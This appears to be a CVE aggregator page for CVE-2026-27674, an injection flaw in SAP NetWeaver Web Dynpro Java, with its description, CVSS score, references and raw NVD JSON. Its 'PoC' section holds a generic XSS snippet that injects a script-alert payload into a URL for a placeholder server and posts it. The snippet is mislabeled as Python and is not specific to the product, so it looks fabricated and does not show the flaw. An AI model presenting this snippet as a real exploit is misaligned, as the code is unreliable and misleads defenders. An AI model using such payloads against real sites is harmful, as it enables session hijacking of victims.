CVE-2026-27674

Description

Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim�s browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver Application Server Java (Web Dynpro Java) (具体受影响版本请参考SAP Note 3719397)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-27674
// This demonstrates how an attacker might inject a script payload.

var vulnerableParam = "<script>alert('XSS - CVE-2026-27674');</script>";
var url = "https://target-server.com/web_dynpro_endpoint?input=" + encodeURIComponent(vulnerableParam);

// Attacker sends this link to the victim.
// When victim clicks, the script executes in their browser context.
fetch(url, { method: 'POST', body: "data=" + vulnerableParam })
  .then(response => console.log('Payload sent'));

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27674
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27674
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27674/
[4] VulDB https://vuldb.com/cve/CVE-2026-27674
[5] https://me.sap.com/notes/3719397
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27674", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:05.670", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim�s browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://me.sap.com/notes/3719397", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}